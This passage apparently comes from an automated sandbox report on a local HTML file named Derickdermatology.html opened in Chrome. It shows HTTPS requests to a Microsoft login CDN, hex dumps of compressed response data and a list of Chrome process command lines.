                                                                                                      2024-10-30 16:13:50 UTC16384INData Raw: 7c 5f 33 90 18 0e f6 15 fb 9f fd c2 2d 7c f6 09 99 56 e0 1b df 55 00 e9 61 19 a9 ae 08 b4 08 de 5e 5e 8b 45 87 04 e9 6b b8 4e 14 17 ac 44 38 17 c4 11 e4 15 f5 05 82 e4 5a e1 00 e1 b1 7a c3 5a 2a cb eb 40 53 54 ab c1 7c ad ba a5 5c a6 6e 38 df 2e 84 c6 0f 51 3b 3d 74 de 84 36 7f d1 36 c8 68 2e a7 19 09 6f b4 0d 8a 69 11 fc 25 99 f6 55 32 25 02 a3 cd f2 e5 b9 1f 5a 92 03 c5 6a 6e d0 c6 ff b1 0d 05 a2 16 7e 06 11 d8 2f e6 d8 0b d6 12 91 54 cd 2a 90 95 47 9c 89 ce 07 af 7b 17 a7 3f 3f c1 8f fe 53 46 e8 38 88 e1 92 f5 d4 34 4b ca ff d8 a1 26 dd bc d2 22 ad b5 44 6f f6 c3 ab 20 de c6 32 0d 70 78 26 6a f3 08 a8 73 81 d6 01 20 73 48 80 a3 ea 25 4e 2a 1f eb b1 f6 d7 5d 21 e3 43 50 cc 65 af 1d a9 f7 78 ab d5 9d ad 16 9b 6a 23 b0 19 6a 77 87 19 d4 e8 5c 71 be bd e2
                                                                                                      Data Ascii: |_3-|VUa^^EkND8ZzZ*@ST|\n8.Q;=t66h.oi%U2%Zjn~/T*G{??SF84K&"Do 2px&js sH%N*]!CPexj#jw\q
                                                                                                      2024-10-30 16:13:50 UTC1550INData Raw: f4 dd 37 c9 ee f7 8f f6 e2 dd 6f 66 df 7e bf fb 7d f2 f5 de 6e fc a7 bd af f7 bf 9d 3d fa d3 77 5f ff c9 21 56 2a a5 73 b5 26 36 2a 27 82 5f 12 0b 55 10 07 45 ac c1 2c da 23 56 89 cf dd 43 f9 73 20 7f 9e 75 9c 76 3f 1a ef 92 4a 90 bf 91 22 52 db 77 24 13 55 ce a9 1a 01 89 98 e7 e9 12 09 35 70 a9 69 d1 8b 04 3e 39 b8 03 34 3d 1a 1b f6 0d 11 dc b4 09 a7 5a e3 8c 8b a0 d8 8e 04 67 bc 91 4c 62 e2 2d 07 7e 93 24 60 c7 c4 68 e0 da 03 1d 6c 3c 21 5c 7a 3a 4f b3 ab 34 19 29 dd 15 7b 6b c9 37 46 ce 38 f3 54 8a b9 ab e3 f2 64 a2 b4 95 f8 ed 6f a1 2d 95 5b 98 f6 b3 12 95 75 5d 1b eb 28 7f d3 8a 79 02 81 cc da 41 13 ca b3 45 0d 0a 89 e2 cd 78 84 e3 f1 cc c7 60 84 29 31 ff 70 62 90 50 0e 31 a6 45 b5 e7 53 db ac f1 3b a1 c9 6b 77 f7 30 e5 18 a3 e1 de ba 4a ef 2b 37 c0
                                                                                                      Data Ascii: 7of~}n=w_!V*s&6*'_UE,#VCs uv?J"Rw$U5pi>94=ZgLb-~$`hl<!\z:O4){k7F8Tdo-[u](yAEx`)1pbP1ES;kw0J+7


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      23192.168.2.165004213.107.246.454437792C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-30 16:13:51 UTC408OUTGET /shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1
                                                                                                      Host: aadcdn.msauth.net
                                                                                                      Connection: keep-alive
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                      Accept: */*
                                                                                                      Sec-Fetch-Site: none
                                                                                                      Sec-Fetch-Mode: cors
                                                                                                      Sec-Fetch-Dest: empty
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      2024-10-30 16:13:51 UTC791INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 30 Oct 2024 16:13:51 GMT
                                                                                                      Content-Type: application/x-javascript
                                                                                                      Content-Length: 49911
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                      Content-Encoding: gzip
                                                                                                      Last-Modified: Wed, 02 Oct 2024 20:05:23 GMT
                                                                                                      ETag: 0x8DCE31D8CF87EF9
                                                                                                      x-ms-request-id: 58e2db8b-901e-0046-32a9-27f7d1000000
                                                                                                      x-ms-version: 2009-09-19
                                                                                                      x-ms-lease-status: unlocked
                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      x-azure-ref: 20241030T161351Z-15b8d89586fbmg6qpd9yf8zhm0000000037g0000000080t8
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-30 16:13:51 UTC15593INData Raw: 1f 8b 08 00 00 00 00 00 04 00 e4 bd 6d 5b e3 38 d2 30 fa fd fe 15 c1 bb 0f 1d 4f 4c c8 0b d0 e0 b4 3b 77 1a d2 dd cc 00 61 08 cc cc 2e b0 5c 4e ac 80 bb 83 9d b5 1d 68 06 72 7e fb a9 17 c9 96 1d 87 ee d9 3d d7 f9 f2 cc 0b b1 a5 92 2c 95 aa 4a 55 a5 92 b4 f9 d3 da ff 54 7e aa 6c fc f8 3f 95 e1 79 ef ec bc 32 f8 58 39 ff 7c 78 76 50 39 85 b7 7f 54 4e 06 e7 87 fb fd 1f af 07 3f 8a ff 9f df f9 71 65 e2 4f 45 05 7e 47 6e 2c bc 4a 18 54 c2 a8 e2 07 e3 30 9a 85 91 9b 88 b8 72 0f 7f 23 df 9d 56 26 51 78 5f 49 ee 44 65 16 85 5f c4 38 89 2b 53 3f 4e a0 d0 48 4c c3 c7 4a 15 aa 8b bc ca a9 1b 25 4f 95 c3 53 b3 0e f5 0b a8 cd bf f5 03 28 3d 0e 67 4f f0 7c 97 54 82 30 f1 c7 a2 e2 06 1e d5 36 85 97 20 16 95 79 e0 89 a8 f2 78 e7 8f ef 2a c7 fe 38 0a e3 70 92 54 22 31 16
                                                                                                      Data Ascii: m[80OL;wa.\Nhr~=,JUT~l?y2X9|xvP9TN?qeOE~Gn,JT0r#V&Qx_IDe_8+S?NHLJ%OS(=gO|T06 yx*8pT"1
                                                                                                      2024-10-30 16:13:51 UTC16384INData Raw: 02 a2 23 27 68 d7 13 77 83 5b ce 75 c8 5d 1e 38 7e d8 ef 65 93 b7 51 ba 99 a3 99 6e c4 c1 49 25 dd 80 44 6f 6d d6 5b f8 24 0d de 5f 42 cf db 25 c7 07 20 5b 70 93 25 fa 4a f2 b1 09 72 79 ab 24 b3 29 e5 95 16 1b 3c 9b e3 f6 1e bc 63 2b a7 73 9c 09 3c 7b 87 34 0e 7c c0 b3 7e cf c4 83 50 e7 60 ac d8 21 42 fd 4d eb 90 1b 4e 38 90 99 77 8e e0 d0 a6 2f bd 49 a2 b4 57 da 5c 87 87 25 cd 61 58 8e c4 2d 4e ad 5b 1a 28 47 10 3f 31 5a 3e 44 bc 65 2b c5 c3 87 fc 45 47 b6 f1 b7 8f bd 8f 7b 1f 77 8d bc 52 c5 f3 16 77 73 08 e5 a7 d2 38 b4 8d 58 7b 03 2e 80 2a 7d 95 75 9f bd f0 3c 9d e0 69 54 92 0e 40 a4 ab 30 9c 54 f3 53 f3 32 8c 02 fa 7d e9 16 60 90 4a da 17 b0 b9 c2 43 2e b7 f6 3f 0c ce 10 8a e3 b7 49 a4 a8 49 28 d5 0d 41 59 e3 36 4b e1 be dd c8 64 fa 76 93 fc 38 74 6a
                                                                                                      Data Ascii: #'hw[u]8~eQnI%Dom[$_B% [p%Jry$)<c+s<{4|~P`!BMN8w/IW\%aX-N[(G?1Z>De+EG{wRws8X{.*}u<iT@0TS2}`JC.?II(AY6Kdv8tj
                                                                                                      2024-10-30 16:13:52 UTC16384INData Raw: 7c 5f 33 90 18 0e f6 15 fb 9f fd c2 2d 7c f6 09 99 56 e0 1b df 55 00 e9 61 19 a9 ae 08 b4 08 de 5e 5e 8b 45 87 04 e9 6b b8 4e 14 17 ac 44 38 17 c4 11 e4 15 f5 05 82 e4 5a e1 00 e1 b1 7a c3 5a 2a cb eb 40 53 54 ab c1 7c ad ba a5 5c a6 6e 38 df 2e 84 c6 0f 51 3b 3d 74 de 84 36 7f d1 36 c8 68 2e a7 19 09 6f b4 0d 8a 69 11 fc 25 99 f6 55 32 25 02 a3 cd f2 e5 b9 1f 5a 92 03 c5 6a 6e d0 c6 ff b1 0d 05 a2 16 7e 06 11 d8 2f e6 d8 0b d6 12 91 54 cd 2a 90 95 47 9c 89 ce 07 af 7b 17 a7 3f 3f c1 8f fe 53 46 e8 38 88 e1 92 f5 d4 34 4b ca ff d8 a1 26 dd bc d2 22 ad b5 44 6f f6 c3 ab 20 de c6 32 0d 70 78 26 6a f3 08 a8 73 81 d6 01 20 73 48 80 a3 ea 25 4e 2a 1f eb b1 f6 d7 5d 21 e3 43 50 cc 65 af 1d a9 f7 78 ab d5 9d ad 16 9b 6a 23 b0 19 6a 77 87 19 d4 e8 5c 71 be bd e2
                                                                                                      Data Ascii: |_3-|VUa^^EkND8ZzZ*@ST|\n8.Q;=t66h.oi%U2%Zjn~/T*G{??SF84K&"Do 2px&js sH%N*]!CPexj#jw\q
                                                                                                      2024-10-30 16:13:52 UTC1550INData Raw: f4 dd 37 c9 ee f7 8f f6 e2 dd 6f 66 df 7e bf fb 7d f2 f5 de 6e fc a7 bd af f7 bf 9d 3d fa d3 77 5f ff c9 21 56 2a a5 73 b5 26 36 2a 27 82 5f 12 0b 55 10 07 45 ac c1 2c da 23 56 89 cf dd 43 f9 73 20 7f 9e 75 9c 76 3f 1a ef 92 4a 90 bf 91 22 52 db 77 24 13 55 ce a9 1a 01 89 98 e7 e9 12 09 35 70 a9 69 d1 8b 04 3e 39 b8 03 34 3d 1a 1b f6 0d 11 dc b4 09 a7 5a e3 8c 8b a0 d8 8e 04 67 bc 91 4c 62 e2 2d 07 7e 93 24 60 c7 c4 68 e0 da 03 1d 6c 3c 21 5c 7a 3a 4f b3 ab 34 19 29 dd 15 7b 6b c9 37 46 ce 38 f3 54 8a b9 ab e3 f2 64 a2 b4 95 f8 ed 6f a1 2d 95 5b 98 f6 b3 12 95 75 5d 1b eb 28 7f d3 8a 79 02 81 cc da 41 13 ca b3 45 0d 0a 89 e2 cd 78 84 e3 f1 cc c7 60 84 29 31 ff 70 62 90 50 0e 31 a6 45 b5 e7 53 db ac f1 3b a1 c9 6b 77 f7 30 e5 18 a3 e1 de ba 4a ef 2b 37 c0
                                                                                                      Data Ascii: 7of~}n=w_!V*s&6*'_UE,#VCs uv?J"Rw$U5pi>94=ZgLb-~$`hl<!\z:O4){k7F8Tdo-[u](yAEx`)1pbP1ES;kw0J+7


                                                                                                      Click to jump to process

                                                                                                      Click to jump to process

                                                                                                      Click to jump to process

                                                                                                      Target ID:1
                                                                                                      Start time:12:12:46
                                                                                                      Start date:30/10/2024
                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Derickdermatology.html
                                                                                                      Imagebase:0x7ff7f9810000
                                                                                                      File size:3'242'272 bytes
                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:3
                                                                                                      Start time:12:12:47
                                                                                                      Start date:30/10/2024
                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1964,i,11314457020440692918,918802598035399171,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                      Imagebase:0x7ff7f9810000
                                                                                                      File size:3'242'272 bytes
                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:11
                                                                                                      Start time:12:13:18
                                                                                                      Start date:30/10/2024
                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Derickdermatology.html
                                                                                                      Imagebase:0x7ff7f9810000
                                                                                                      File size:3'242'272 bytes
                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:12
                                                                                                      Start time:12:13:18
                                                                                                      Start date:30/10/2024
                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1892,i,752861697827379664,18182631419507974909,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                      Imagebase:0x7ff7f9810000
                                                                                                      File size:3'242'272 bytes
                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:13
                                                                                                      Start time:12:13:35
                                                                                                      Start date:30/10/2024
                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Derickdermatology.html
                                                                                                      Imagebase:0x7ff7f9810000
                                                                                                      File size:3'242'272 bytes
                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:14
                                                                                                      Start time:12:13:35
                                                                                                      Start date:30/10/2024
                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1668 --field-trial-handle=1908,i,11277362346978830848,2288916482173699975,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                      Imagebase:0x7ff7f9810000
                                                                                                      File size:3'242'272 bytes
                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      No disassembly